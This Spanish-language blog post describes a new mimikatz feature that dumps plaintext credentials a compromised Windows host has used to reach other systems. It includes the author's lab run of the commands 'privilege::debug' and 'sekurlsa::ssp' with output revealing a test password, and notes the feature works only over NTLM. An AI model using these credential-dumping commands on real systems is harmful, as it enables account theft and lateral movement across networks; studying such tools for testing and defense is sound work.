Hasta hace poco, mimikatz tan sólo mostraba en texto claro las contraseñas de los usuarios que hubieran iniciado una sesión interactiva en el equipo (iniciando sesión localmente, a través de escritorio remoto...). Hace una semana, se publicó una nueva versión que permitía recuperar
Ésta es una funcionalidad muy esperada porque puede servir para recuperar más credenciales de un sistema una vez comprometido. El problema que le he visto, es que se recuperan las credenciales de los sistemas a los que nos conectamos desde el equipo comprometido, pero no la de las cuentas que se conectan a dicho equipo. Es decir, que si se comprometiera un servidor de ficheros, no podríamos recuperar las contraseñas de todos los usuarios conectados al mismo. Pero por el contrario, si se compromete una estación de trabajo de un administrador que tiene diferentes contraseñas con las que conectarse a diferentes recursos de red, podremos recuperar todas esas contraseñas.
De momento habrá que aprovechar la nueva funcionalidad mientras esperamos algo que nos permita recuperar las credenciales de las cuentas conectadas a un equipo.
La prueba que he hecho ha sido conectarme desde un sistema Windows (TEST) a un segundo (PRUEBAS01) y ejecutar después mimikatz en TEST. Éste ha sido el resultado:
C:\>mimikatz.exe mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Jan 15 2013 06:20:17) */ // http://blog.gentilkiwi.com/mimikatz mimikatz # privilege::debug Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK mimikatz # sekurlsa::ssp Authentification Id : 0;997 Package d'authentification : Negotiate Utilisateur principal : SERVICIO LOCAL Domaine d'authentification : NT AUTHORITY ssp : Authentification Id : 0;38685 Package d'authentification : NTLM Utilisateur principal : TEST Domaine d'authentification : TEST-863C3D4E8A ssp : [0] { admin ; PRUEBAS01 ; EstaEsMiPassword123 } Authentification Id : 0;996 Package d'authentification : Negotiate Utilisateur principal : Servicio de red Domaine d'authentification : NT AUTHORITY ssp : Authentification Id : 0;31314 Package d'authentification : NTLM Utilisateur principal : Domaine d'authentification : ssp : Authentification Id : 0;999 Package d'authentification : NTLM Utilisateur principal : TEST-863C3D4E8A$ Domaine d'authentification : GRUPO_TRABAJO ssp : mimikatz #
Como se puede ver, mimikatz lista los recursos externos en los que hay una sesión iniciada y las credenciales que se han utilizado para conectarse.
¡Ojo! Ahora mismo, esta nueva funcionalidad tan sólo obtiene las credenciales utilizadas para conectarse a otros sistemas en los procesos de autenticación que se haya utilizado NTLM como protocolo. Es decir, que si en una red local, las conexiones remotas se negocian a través de Kerberos, mimikatz no podrá sacar las credenciales en claro.
Interesante, ¿no?